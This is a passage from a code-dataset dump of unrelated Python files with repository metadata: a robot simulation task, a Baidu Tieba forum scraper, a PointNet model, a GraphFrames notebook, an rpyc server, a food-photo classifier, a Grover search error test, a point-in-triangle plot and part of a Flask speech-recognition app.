= SpawnBoundary([self.boundary])\n for ob in [self.target, *self.distractors]:\n b.sample(\n ob,\n min_distance=0.15,\n min_rotation=(0, 0, -3.14 / 4),\n max_rotation=(0, 0, 3.14 / 4),\n )\n else:\n sample_material_color(self.target, material_index=0, sample_color_index=0)\n sample_material_color(\n self.distractors[0], material_index=1, sample_color_index=0\n )\n sample_material_color(\n self.distractors[1], material_index=0, sample_color_index=2\n )\n # shapes[0] is =block=, only one shape for now.\n self.frame = 0\n self.last_play_frame = 0\n return [f\"pick up the {self.target.get_material_name()} {shapes[0]}\"]\n\n def is_static_workspace(self) -> bool:\n return True\n\n def variation_count(self) -> int:\n # TODO: The number of variations for this task.\n return len(MATERIALS)\n\n def step(self) -> None:\n self.last_play_frame\n self.frame += 1\n # Called during each sim step. 
Remove this if not using.\n for obj in self.objs:\n if obj.check_collision(self.r_palm) or obj.check_collision(self.Container):\n # TODO:\n # - [X] Play sound in background\n # - [ ] Only play sound when intentionally knock on objects\n # For testing\n obj_sound = obj.get_material_sound()\n # Avoid play repeated sound too soon.\n if (\n obj_sound is not None\n and obj_sound != \"None\"\n and self.frame - self.last_play_frame > 20\n ):\n print(f\"=====>>>> Playing {obj_sound}\")\n playsound(obj_sound, block=False)\n self.last_play_frame = self.frame\n self.record(obj_sound)\n\n if (\n obj.check_collision(self.r_Tbumper)\n or obj.check_collision(self.r_Ibumper)\n or obj.check_collision(self.r_Mbumper)\n or obj.check_collision(self.r_Rbumper)\n or obj.check_collision(self.r_Lbumper)\n ):\n obj_touch = obj.get_touch_data()\n self.touch(obj_touch)\n\n obj_weight = obj.get_weight()\n self.weigh(obj_weight)\n # print(f\"=====>>>> Feeling {obj_touch}\")\n # print(f\"=====>>>> Weighing {obj_weight}\")\n\n def set_mode(self, mode):\n self._mode = mode\n\n def set_random(self, random):\n self._random = random\n\n @property\n def random(self):\n return self._random\n\n @property\n def mode(self):\n return self._mode\n\n @property\n def records(self):\n return self._records\n\n def record(self, sound):\n self._records.append(sound)\n\n def clear_records(self):\n self._records = []\n\n @property\n def touchs(self):\n return self._touchs\n\n def touch(self, touch_data):\n self._touchs.append(touch_data)\n\n def clear_touchs(self):\n self._touchs = []\n\n @property\n def weights(self):\n return self._weights\n\n def weigh(self, weight):\n self._weights.append(weight)\n\n def clear_weights(self):\n self._weights = []\n\n def cleanup(self) -> None:\n # Called during at the end of each episode. 
Remove this if not using.\n self.clear_records()\n self.clear_touchs()\n self.clear_weights()\n\n def base_rotation_bounds(\n self,\n ) -> Tuple[Tuple[float, float, float], Tuple[float, float, float]]:\n \"\"\"Defines how much the task base can rotate during episode placement.\n\n Default is set such that it can rotate any amount on the z axis.\n\n :return: A tuple containing the min and max (x, y, z) rotation bounds\n (in radians).\n \"\"\"\n return (0.0, 0.0, 0), (0.0, 0.0, 0)\n\n def load(self) -> Object:\n if Object.exists(self.name):\n return Dummy(self.name)\n ttm_file = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n './task_ttms/%s.ttm' % self.name)\n if not os.path.isfile(ttm_file):\n raise FileNotFoundError(\n 'The following is not a valid task .ttm file: %s' % ttm_file)\n self._base_object = self.pyrep.import_model(ttm_file)\n return self._base_object","repo_name":"xf-zhao/Matcha-agent","sub_path":"NICOL/rlbench_tasks/knocking.py","file_name":"knocking.py","file_ext":"py","file_size_in_byte":11892,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"74271032515","text":"import chardet\nimport aiohttp\nimport traceback\nimport lxml.html\nfrom bs4 import BeautifulSoup\nimport logging\n\nfrom abc import ABCMeta, abstractmethod\nfrom builtins import Exception\nimport asyncio\nfrom time import sleep\nfrom django.db import models\n\n\nclass ReadPropertyNameException(Exception):\n\n def __init__(self):\n logging.info('Can not read property name')\n\n\nclass LoadPropertyPageException(Exception):\n\n def __init__(self):\n logging.info('Can not load property page')\n\n\nclass ParserBase(metaclass=ABCMeta):\n\n @abstractmethod\n def getCharset(self):\n pass\n\n @abstractmethod\n def createEntity(self)->models.Model:\n return None\n \n @abstractmethod\n def _parsePropertyDetailPage(self, item:models.Model, response:BeautifulSoup)->models.Model:\n return item\n \n async def parsePropertyDetailPage(self, session, url)->models.Model:\n item:models.Model = self.createEntity()\n try:\n item.pageUrl = url\n response:BeautifulSoup = await self.getResponseBs(session, url)\n item = self._parsePropertyDetailPage(item, response)\n except (LoadPropertyPageException, TimeoutError) as e:\n raise e\n except (ReadPropertyNameException) as e:\n raise e\n except Exception as e:\n logging.error('Detail parse error:' + url)\n logging.error(traceback.format_exc())\n raise e\n return item\n\n async def _parsePageCore(self, response, getXpath , getDestUrl):\n linklist = response.xpath(getXpath())\n for linkUrl in linklist:\n destUrl = getDestUrl(linkUrl)\n logging.debug(destUrl)\n yield destUrl\n\n async def parsePage(self, session, url, getXpath , getDestUrl):\n response = await self.getResponse(session, url, self.getCharset()) \n async for destUrl in self._parsePageCore(response, getXpath, getDestUrl):\n yield destUrl\n\n async def parsePageBs(self, session, url, getXpath , getDestUrl):\n response = await self.getResponseBs(session, url, self.getCharset())\n linklist = response.xpath(getXpath())\n for linkUrl in linklist:\n destUrl = getDestUrl(linkUrl)\n logging.info(destUrl)\n yield destUrl\n\n async def _get(self, session, url):\n try:\n r = await session.get(url)\n except (asyncio.TimeoutError, TimeoutError, aiohttp.client_exceptions.ClientConnectorError, aiohttp.client_exceptions.ServerDisconnectedError):\n sleep(10000)\n r = await session.get(url)\n return r\n \n async def _getContent(self, session, url):\n try:\n r = await 
self._get(session, url)\n # r = await session.get(url)\n content = await r.content.read()\n return content\n except aiohttp.ClientError as e:\n logging.error(traceback.format_exc())\n raise e\n except (Exception) as e:\n logging.error(traceback.format_exc())\n raise e\n \n async def getResponse(self, session, url, charset=None):\n\n async def getDocument():\n content = await self._getContent(session, url)\n if (charset is None):\n encoding = self.getCharset()\n if(encoding is None):\n encoding = chardet.detect(content)[\"encoding\"]\n else:\n encoding = charset\n return lxml.html.fromstring(html=content, parser=lxml.html.HTMLParser(encoding=encoding))\n\n try:\n return await getDocument()\n except(TypeError):\n return await getDocument()\n\n async def getResponseBs(self, session, url, charset=None) -> BeautifulSoup:\n\n async def getDocument():\n content = await self._getContent(session, url)\n if (charset is None):\n encoding = self.getCharset()\n if(encoding is None):\n encoding = chardet.detect(content)[\"encoding\"]\n else:\n encoding = charset\n return BeautifulSoup(content, \"html.parser\", from_encoding=encoding)\n\n try:\n return await getDocument()\n except(TypeError):\n return await getDocument()\n","repo_name":"AnaharaYasuo/realestate_crawler","sub_path":"src/function/sumifu/package/parser/baseParser.py","file_name":"baseParser.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40501494255","text":"\"\"\"\nImplementation of the PointNet model using pytorch\n\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom collections import OrderedDict\nimport torch_geometric.transforms as T\nfrom torch.nn import Linear\nimport torch.nn.functional as F\nfrom torch_geometric.nn import MLP, DynamicEdgeConv, global_max_pool\n\n\nfrom blip.models.common import activations, normalizations\nfrom blip.models import GenericModel\n\npointnet_unsupervised_config = {\n # input dimension\n 'input_dimension': 3,\n # number of dynamic edge convs\n 'num_dynamic_edge_conv': 2,\n # edge conv layer values\n 'edge_conv_mlp_layers': [\n [64, 64],\n [64, 64]\n ],\n 'number_of_neighbors': 20,\n 'aggregation_operators': [\n 'sum', 'sum'\n ],\n # linear layer\n 'linear_output': 128,\n 'mlp_output_layers': [128, 256, 32],\n 'augmentations': [\n T.RandomJitter(0.03), \n T.RandomFlip(1), \n T.RandomShear(0.2)\n ],\n # number of augmentations per batch\n 'number_of_augmentations': 2\n}\n\nclass PointNetUnsupervised(GenericModel):\n \"\"\"\n \"\"\"\n def __init__(self,\n name: str='pointnet_unsupervised',\n cfg: dict=pointnet_unsupervised_config\n ):\n super(PointNetUnsupervised, self).__init__(name, cfg)\n self.cfg = cfg\n self.augmentation = T.Compose(self.cfg['augmentations'])\n\n # construct the model\n self.forward_views = {}\n self.forward_view_map = {}\n # construct the model\n self.construct_model()\n # register hooks\n self.register_forward_hooks()\n\n def construct_model(self):\n \"\"\"\n \n \"\"\"\n \"\"\"\n The current methodology is to create an ordered\n dictionary and fill it with individual modules.\n \"\"\"\n self.logger.info(f\"Attempting to build chunc architecture using cfg: {self.cfg}\")\n _edge_conv_dict = OrderedDict()\n _linear_dict = OrderedDict()\n _mlp_dict = OrderedDict()\n\n self.input_dimension = self.cfg['input_dimension']\n _input_dimension = self.cfg['input_dimension']\n _num_edge_conv_outputs = 0\n # Feature extraction\n # an example would be\n # self.conv1 = 
DynamicEdgeConv(MLP([2 * 3, 64, 64]), k, aggr)\n # self.conv2 = DynamicEdgeConv(MLP([2 * 64, 128]), k, aggr)\n for ii in range(self.cfg['num_dynamic_edge_conv']):\n _edge_conv_dict[f'edge_conv_{ii}'] = DynamicEdgeConv(\n MLP([2 * _input_dimension] + self.cfg['edge_conv_mlp_layers'][ii]), \n self.cfg['number_of_neighbors'],\n self.cfg['aggregation_operators'][ii]\n )\n _input_dimension = self.cfg['edge_conv_mlp_layers'][ii][-1]\n _num_edge_conv_outputs += _input_dimension\n \n # add linear layer Encoder head\n _linear_dict[f'linear_layer'] = Linear(\n _num_edge_conv_outputs, \n self.cfg['linear_output']\n )\n\n # add output mlp Projection head (See explanation in SimCLRv2)\n _mlp_dict[f'mlp_output'] = MLP(\n self.cfg['mlp_output_layers']\n )\n \n # create the dictionaries\n self.edge_conv_dict = nn.ModuleDict(_edge_conv_dict)\n self.linear_dict = nn.ModuleDict(_linear_dict)\n self.mlp_dict = nn.ModuleDict(_mlp_dict)\n\n # record the info\n self.logger.info(f\"Constructed BLIP with dictionaries:\\n{self.edge_conv_dict}\\n{self.linear_dict}\\n{self.mlp_dict}.\")\n\n \n def forward(self,\n x\n ):\n \"\"\"\n Iterate over the model dictionary\n \"\"\"\n x = x.to(self.device)\n # if self.training:\n # Get augmentations of the batch\n embeddings, pools, reductions = [], [], []\n for ii in range(self.cfg['number_of_augmentations']):\n augmentations = self.augmentation(x)\n pos, batch = augmentations.pos, augmentations.batch\n for jj, layer in enumerate(self.edge_conv_dict.keys()):\n pos = self.edge_conv_dict[layer](pos, batch)\n if jj == 0:\n linear_input = pos\n else:\n linear_input = torch.cat([linear_input, pos], dim=1)\n\n linear_output = self.linear_dict['linear_layer'](linear_input)\n linear_pool = global_max_pool(linear_output, batch)\n linear_reduction = self.mlp_dict['mlp_output'](linear_pool)\n\n embeddings.append(linear_input)\n pools.append(linear_pool)\n reductions.append(linear_reduction)\n\n embeddings = torch.cat(embeddings)\n reductions = torch.cat(reductions)\n pools = torch.cat(pools)\n\n return {\n 'embeddings': embeddings,\n 'pools': pools, \n 'reductions': reductions, \n }\n \n def forward_eval(self,\n x\n ):\n \"\"\"\n Iterate over the model dictionary\n \"\"\"\n x = x.to(self.device)\n # if self.training:\n pos, batch = x.pos, x.batch\n for ii, layer in enumerate(self.edge_conv_dict.keys()):\n pos = self.edge_conv_dict[layer](pos, batch)\n if ii == 0:\n linear_input = pos\n else:\n linear_input = torch.cat([linear_input, pos], dim=1)\n\n linear_output = self.linear_dict['linear_layer'](linear_input)\n linear_pool = global_max_pool(linear_output, batch)\n linear_compact = self.mlp_dict['mlp_output'](linear_pool)\n\n labels = x.category\n\n return linear_pool, linear_compact, labels","repo_name":"Neutron-Calibration-in-DUNE/Blip","sub_path":"blip/models/arxiv/pointnet_unsupervised.py","file_name":"pointnet_unsupervised.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70322315075","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport os\nimport math\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\n\n\n# In[2]:\n\nsc.master\n\n\n# In[3]:\n\n# spark related\nfrom pyspark.sql import DataFrameWriter\nfrom pyspark.sql import SQLContext\nsqlContext = SQLContext(sc)\nsql = sqlContext.sql\n\n\n# In[4]:\n\n# graph related\nfrom graphframes import *\n\n\n# In[5]:\n\n# Vertex DataFrame\nv = sqlContext.createDataFrame([\n (\"a\", \"Alice\", 
34),\n (\"b\", \"Bob\", 36),\n (\"c\", \"Charlie\", 30),\n (\"d\", \"David\", 29),\n (\"e\", \"Esther\", 32),\n (\"f\", \"Fanny\", 36),\n (\"g\", \"Gabby\", 60)\n], [\"id\", \"name\", \"age\"])\n\n\n# In[6]:\n\n# Edge DataFrame\ne = sqlContext.createDataFrame([\n (\"a\", \"b\", \"friend\"),\n (\"b\", \"c\", \"follow\"),\n (\"c\", \"b\", \"follow\"),\n (\"f\", \"c\", \"follow\"),\n (\"e\", \"f\", \"follow\"),\n (\"e\", \"d\", \"friend\"),\n (\"d\", \"a\", \"friend\"),\n (\"a\", \"e\", \"friend\")\n], [\"src\", \"dst\", \"relationship\"])\n\n\n# In[7]:\n\n# Create a GraphFrame\ng = GraphFrame(v, e)\n\n\n# In[8]:\n\nfrom graphframes.examples import Graphs\ng = Graphs(sqlContext).friends()\n\n\n# In[9]:\n\ng.inDegrees.show()\n\n\n# In[10]:\n\ng.edges.filter(\"relationship = 'follow'\").count()\n\n\n# In[11]:\n\ng.vertices.show()\n\n\n# In[12]:\n\ng.edges.show()\n\n\n# In[13]:\n\n# Find the youngest user's age in the graph.\n# This queries the vertex DataFrame.\ng.vertices.groupBy().min(\"age\").show()\n\n\n# In[14]:\n\n# Count the number of \"follows\" in the graph.\n# This queries the edge DataFrame.\nnumFollows = g.edges.filter(\"relationship = 'follow'\").count()\n\n\n# In[15]:\n\n# Search for pairs of vertices with edges in both directions between them.\nmotifs = g.find(\"(a)-[e]->(b); (b)-[e2]->(a)\")\nmotifs.show()\n\n\n# In[16]:\n\n# More complex queries can be expressed by applying filters.\nmotifs.filter(\"b.age > 30\").show()\n\n\n# In[17]:\n\nfrom pyspark.sql.functions import col, lit, udf, when\nfrom pyspark.sql.types import IntegerType\n\n\n# In[18]:\n\nchain4 = g.find(\"(a)-[ab]->(b); (b)-[bc]->(c); (c)-[cd]->(d)\")\n\n\n# In[19]:\n\n# Query on sequence, with state (cnt)\n# (a) Define method for updating state given the next element of the motif.\nsumFriends = lambda cnt,relationship: when(relationship == \"friend\", cnt+1).otherwise(cnt)\n\n\n# In[20]:\n\n# (b) Use sequence operation to apply method to sequence of elements in motif.\n# In this case, the elements are the 3 edges.\ncondition = reduce(lambda cnt,e: sumFriends(cnt, col(e).relationship), [\"ab\", \"bc\", \"cd\"], lit(0))\n\n\n# In[21]:\n\n# (c) Apply filter to DataFrame.\nchainWith2Friends2 = chain4.where(condition >= 2)\nchainWith2Friends2.show()\n\n\n# In[22]:\n\n# Select subgraph of users older than 30, and edges of type \"friend\"\nv2 = g.vertices.filter(\"age > 30\")\ne2 = g.edges.filter(\"relationship = 'friend'\")\ng2 = GraphFrame(v2, e2)\n\n\n# In[23]:\n\ng2.edges.show()\n\n\n# In[24]:\n\n# Select subgraph based on edges \"e\" of type \"follow\"\n# pointing from a younger user \"a\" to an older user \"b\".\npaths = g.find(\"(a)-[e]->(b)\") .filter(\"e.relationship = 'follow'\") .filter(\"a.age < b.age\")\n\n\n# In[25]:\n\n# \"paths\" contains vertex info. 
Extract the edges.\n e2 = paths.select(\"e.src\", \"e.dst\", \"e.relationship\")\n\n\n# In[26]:\n\n# Construct the subgraph\ng2 = GraphFrame(g.vertices, e2)\n\n\n# In[27]:\n\n# Search from \"Esther\" for users of age < 32.\npaths = g.bfs(\"name = 'Esther'\", \"age < 32\")\npaths.show()\n\n\n# In[28]:\n\n# Specify edge filters or max path lengths.\ng.bfs(\"name = 'Esther'\", \"age < 32\", edgeFilter=\"relationship != 'friend'\", maxPathLength=3)\n\n\n# In[29]:\n\n# Save vertices and edges as Parquet to some location.\n# g.vertices.write.parquet(\"hdfs://myLocation/vertices\")\n# g.edges.write.parquet(\"hdfs://myLocation/edges\")\n\n# Load the vertices and edges back.\n# sameV = sqlContext.read.parquet(\"hdfs://myLocation/vertices\")\n# sameE = sqlContext.read.parquet(\"hdfs://myLocation/edges\")\n\n","repo_name":"djfire1296/HackNTU_Cathay2017","sub_path":"To_py/GraphExample.py","file_name":"GraphExample.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28634658915","text":"import rpyc\nfrom rpyc.utils.server import ThreadedServer\nimport json\n\nclass MyService(rpyc.Service):\n def exposed_calculateMidpoint(self, data):\n pts = json.loads(data)\n # Midpoint of (x1, y1) and (x2, y2): average the x's and the y's.\n return json.dumps({\n \"x\": (pts[\"x1\"] + pts[\"x2\"]) / 2,\n \"y\": (pts[\"y1\"] + pts[\"y2\"]) / 2,\n })\n\nt = ThreadedServer(MyService, port=8080)\nt.start()\n\n\n\n\n\n","repo_name":"wongjiahau/tcpip-network-application-practicals-answer","sub_path":"p2/async_version/q2server.py","file_name":"q2server.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37042401739","text":"import sys\nimport os\nimport shutil\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torchvision.models import resnet50\nfrom PIL import Image\n\n\n# detect and move food images to the 'food' folder\ndef is_food(image_path, model, transform, device):\n image = Image.open(image_path)\n image = transform(image).unsqueeze(0).to(device)\n with torch.no_grad():\n outputs = model(image)\n _, predicted = torch.max(outputs, 1)\n return predicted.item() == 1 # the food class\n\n\n# check if the file is an image file (no videos or raw or heic)\ndef is_image(filename):\n return any(\n filename.lower().endswith(extension) for extension in [\".jpg\", \".jpeg\", \".png\"]\n )\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python find_food.py \")\n sys.exit(1)\n root_dir = sys.argv[1]\n dest = os.path.join(root_dir, \"food\")\n\n if not os.path.exists(dest):\n os.makedirs(dest)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f\"using {device}\")\n \n model = resnet50()\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 2)\n print(\"loading model...\")\n model.load_state_dict(torch.load(\"food_classifier.pth\"))\n model.to(device)\n model.eval()\n\n transform = transforms.Compose(\n [\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]\n )\n print(\"starting evaluation...\")\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if is_image(file_path) and is_food(file_path, model, transform, device):\n shutil.move(file_path, os.path.join(dest, file))\n print(\"o\")\n # if .arw file with same name exists, move that too\n arw_file = os.path.splitext(file)[0] + \".arw\"\n arw_path = os.path.join(root, arw_file)\n if os.path.exists(arw_path):\n shutil.move(arw_path, os.path.join(dest, arw_file))\n print(\"o\")\n else:\n print(\".\")\n","repo_name":"irisxu02/photo-scripts","sub_path":"find_food.py","file_name":"find_food.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6198339942","text":"import numpy as np\nimport cupy as cp\nimport matplotlib.pyplot as plt\nimport random, time\nimport quantum_backend_GPU as quantum\n\n\ndef main():\n\ty = [[] for i in range(3)]\n\terrors = [[] for i in range(3)]\n\terror_size_list = [0.01,0.05,0.1]\n\n\tdatabase = []\n\tbits = 5\n\tlength = 2**bits\n\tfor i in range(length):\n\t\tdatabase.append(0)\n\ttargets=1\n\tfor i in range(targets):\n\t\tdatabase[0]=1\n\titerations = int(np.ceil(np.sqrt(len(database)/targets)))\n\n\tdef f(x):\n\t\tif database[x] == 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tfor num,error_size in enumerate(error_size_list):\n\t\tprint(\"------------------------------------------\")\n\t\tprint(\"Error Size = {}\".format(error_size))\n\t\tshots = 100\n\t\ttrials = 20\n\t\terrorp_step = 0.2\n\t\terrorp_list = np.array([i*errorp_step for i in range(int(1/errorp_step)+1)])\n\t\tresults = [[] for i in range(int(1/errorp_step)+1)]\n\t\tfor errorp in errorp_list:\n\t\t\tprint(\"Testing errorp={}\".format(errorp))\n\t\t\tfor j in range(trials):\n\t\t\t\ttemp = []\n\t\t\t\tfor i in range(shots):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tJ = quantum.Grover(f,bits,verbose=False)\n\t\t\t\t\t\tt = J.search(iterations,errorp=errorp,error_size=error_size)\n\t\t\t\t\t\tresult = quantum.measure(t)\n\t\t\t\t\t\tif result == 0:\n\t\t\t\t\t\t\ttemp.append(1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttemp.append(0)\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttemp.append(0)\n\t\t\t\t\tprint(\"Completed {}/{} shots, {}/{} trials\".format(i+1,shots,j,trials),end=\"\\r\",flush=True)\n\t\t\t\tsuccess = np.mean(temp)\n\t\t\t\tresults[int(errorp/errorp_step)].append(success)\n\t\t\tprint(\"Completed {}/{} shots, {}/{} trials\".format(i+1,shots,trials,trials),end=\"\\r\",flush=True)\n\t\t\tprint(\"\\n\")\n\t\tfor result_list in results:\n\t\t\ty[num].append(np.mean(result_list))\n\t\t\terrors[num].append(np.std(result_list)/np.sqrt(trials))\n\n\tb = [-0.05,0,0.05]\n\tshapes = [\"o\",\"v\",\"*\"]\n\t#print(results)\n\tfig,ax=plt.subplots()\n\tfor i in range(3):\n\t\tax.errorbar(errorp_list+b[i], y[i], yerr=errors[i], fmt=shapes[i], ecolor=\"gray\", elinewidth=0.75, capsize=3, label=str(error_size_list[i]))\n\tplt.xticks(errorp_list)\n\tplt.xlabel(\"Probability of error on a qubit\")\n\tplt.ylabel(\"Success Probability\")\n\tplt.legend(title=\"Error Size\")\n\tplt.title(\"\"\"Experimental probability of successfully finding the target\nmeasured over {} trials of {} shots.\nWorking Register = {} Qubits\"\"\".format(trials,shots,bits)\n)\n\tplt.tight_layout()\n\tplt.show()\n\n\nif __name__==\"__main__\":\n\tmain()\n\n","repo_name":"Lemon9247/PHYS379","sub_path":"Code/grover_error_test.py","file_name":"grover_error_test.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4332472617","text":"import matplotlib.pyplot as plt\n\ndef subtract(p0, p1):\n return (p0[0] - p1[0], p0[1] - p1[1])\n\ndef dotProduct(p0, p1):\n return (p0[0] * p1[0]) + (p0[1] * p1[1])\n\ndef isInside(triangle, point):\n p0, p1, p2 = 
triangle[0], triangle[1], triangle[2]\n dxdy = subtract(p1, p0)\n normal = (dxdy[1], -dxdy[0])\n line1_check = dotProduct(subtract(point, p0), normal) > 0\n print(line1_check)\n\n dxdy = subtract(p2,p1)\n normal = (dxdy[1], -dxdy[0])\n line2_check = dotProduct(subtract(point, p1), normal) <0\n print(line2_check)\n\n dxdy = subtract(p0,p2)\n normal = (dxdy[1], -dxdy[0])\n line3_check = dotProduct(subtract(point, p2), normal) > 0\n print(line3_check)\n\n return line1_check and line2_check and line3_check\n\ntriangle = [\n (3, 1),\n (2, 5),\n (7, 3),\n]\n\ninside_point = (3,2)\noutside_point = (2,1)\n\npoints = [inside_point, outside_point]\n\nfor point in points:\n color = 'go' if isInside(triangle, point) else 'ro'\n plt.plot([point[0]], [point[1]], color)\n\nplt.plot([triangle[0][0], triangle[1][0]], [triangle[0][1], triangle[1][1]], 'b')\nplt.plot([triangle[1][0], triangle[2][0]], [triangle[1][1], triangle[2][1]], 'b')\nplt.plot([triangle[0][0], triangle[2][0]], [triangle[0][1], triangle[2][1]], 'b')\nplt.show()","repo_name":"Typelias/AR_Assignments","sub_path":"Assignment7/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32416556752","text":"###############################\n### Scrape posts from Baidu Tieba ####\n###############################\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# Fetch the web page\ndef get_html(url):\n try:\n r = requests.get(url, timeout=30)\n r.raise_for_status()\n # We know Baidu Tieba is encoded as utf-8; when scraping other pages it is recommended to use:\n # r.encoding = r.apparent_encoding\n r.encoding = 'utf-8'\n return r.text\n except:\n return \"ERROR\"\n\n\ndef get_content(url):\n \"\"\"\n Parse the Tieba page file, organize the information and store it in a list variable\n \"\"\"\n\n # Initialize a list to hold the information of every post\n comments = []\n # First, download the page we need to scrape\n html = get_html(url)\n # print(html) # test\n\n # Parse the html\n soup = BeautifulSoup(html, 'lxml')\n # print(soup) # test\n\n # As analyzed earlier, find all tags with the ' j_thread_list clearfix' class. Returns a list\n liTags = soup.find_all('li', class_=' j_thread_list clearfix')\n # print(liTags) # test\n\n # Loop through the posts to find the information we need\n for li in liTags:\n # Initialize a dict to store the post information\n comment = {}\n try:\n # Start extracting the information\n comment['title'] = li.find('a', class_=\"j_th_tit \").text.strip()\n comment['link'] = \"http://tieba.baidu.com\" + \\\n li.find('a', class_=\"j_th_tit \")['href']\n comment['name'] = li.find('span', class_=\"tb_icon_author \"\n ).text.strip()\n comment['time'] = li.find('span', class_=\"pull-right is_show_create_time\").text.strip()\n comment['replyNum'] = li.find('span', class_=\"threadlist_rep_num center_text\").text.strip()\n comments.append(comment)\n except:\n print(\"Hit a small problem, no big deal :)\",)\n return comments\n\n\ndef Out2File(dict):\n \"\"\"\n Write the scraped data to a local file\n Saved to TB.txt in the current directory\n \"\"\"\n with open('TB.txt', 'a+', encoding='utf-8') as f:\n for comment in dict:\n f.write('Title: {} \t Link: {} \t Author: {} \t Posted: {} \t Replies: {} \n'\n .format(comment['title'], comment['link'], comment['name'], comment['time'], comment['replyNum']))\n print(\"Finished scraping the current page!\")\n f.close()\n\n\ndef main(base_url, deep):\n url_list = []\n # Put all the urls to scrape into a list\n for i in range(0, deep):\n url_list.append(base_url + \"&pn=\" + str(50 * i) + \"#\")\n print('All pages downloaded! Start extracting information >>>>>>>>>')\n\n # Loop and write all the data\n for url in url_list:\n content = get_content(url)\n Out2File(content)\n # print(content)\n print('All information written!')\n\n\nbase_url = \"http://tieba.baidu.com/f?kw=wp7&ie=utf-8\"\n\nif __name__ == '__main__':\n main(base_url, 10)\n","repo_name":"yijigao/Python_scraper","sub_path":"Tieba_scraper/tie_ba_scraper.py","file_name":"tie_ba_scraper.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2474207040","text":"def fat(a):\n a = int(a)\n if a > 1:\n return a*fat(a-1)\n else:\n if(a==0):\n return 1\n return a\n\n\ndef primofast(b):\n b = int(b)\n divisor = int(b/2)\n while(divisor > 1):\n if(b%divisor == 0 and b != 2):\n return False\n divisor=divisor - 1\n return True\n\n\nn=int(input())\nnumeros = input()\nn = numeros.split()\nfor num in n:\n if(primofast(num) and num != '1'):\n print(str(num)+ '! = ' + str(fat(num)))\n\nprint()","repo_name":"lcmajr99/CompetitiveProgramming","sub_path":"URI/Matematica/3312.py","file_name":"3312.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36953142159","text":"# Load libraries\nimport flask\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom pathlib import PurePath\nfrom pydub import AudioSegment\nfrom jiwer import wer\nimport os\n\nword_dict = pd.read_excel(\"ox-api.xlsx\")\n\n# instantiate flask \napp = flask.Flask(__name__)\n\ndef CTCLoss(y_true, y_pred):\n # Compute the training-time loss value\n batch_len = tf.cast(tf.shape(y_true)[0], dtype=\"int64\")\n input_length = tf.cast(tf.shape(y_pred)[1], dtype=\"int64\")\n label_length = tf.cast(tf.shape(y_true)[1], dtype=\"int64\")\n\n input_length = input_length * tf.ones(shape=(batch_len, 1), dtype=\"int64\")\n label_length = label_length * tf.ones(shape=(batch_len, 1), dtype=\"int64\")\n\n loss = keras.backend.ctc_batch_cost(y_true, y_pred, input_length, label_length)\n return loss\n\ncharacters = [x for x in \"abcdefghijklmnopqrstuvwxyz \"]\n# Mapping characters to integers\nchar_to_num = keras.layers.StringLookup(vocabulary=characters, oov_token=\"\")\n# Mapping integers back to original characters\nnum_to_char = keras.layers.StringLookup(\n vocabulary=char_to_num.get_vocabulary(), oov_token=\"\", invert=True\n)\n# An integer scalar Tensor. The window length in samples.\nframe_length = 256\n# An integer scalar Tensor. The number of samples to step.\nframe_step = 160\n# An integer scalar Tensor. The size of the FFT to apply.\n# If not provided, uses the smallest power of 2 enclosing frame_length.\nfft_length = 384\n\ndef encode_testdata(wav_file, label):\n ###########################################\n ## Process the Audio\n ##########################################\n # 1. Read wav file\n file = tf.io.read_file(wav_file)\n # 2. Decode the wav file\n audio, _ = tf.audio.decode_wav(file)\n #print(sample_rate)\n #reduced_noise = nr.reduce_noise(y=audio, sr=44100)\n audio = tf.squeeze(audio, axis=-1)\n # 3. Change type to float\n audio = tf.cast(audio, tf.float32)\n # 4. Get the spectrogram\n spectrogram = tf.signal.stft(\n audio, frame_length=frame_length, frame_step=frame_step, fft_length=fft_length\n )\n # 5. We only need the magnitude, which can be derived by applying tf.abs\n spectrogram = tf.abs(spectrogram)\n spectrogram = tf.math.pow(spectrogram, 0.5)\n # 6. 
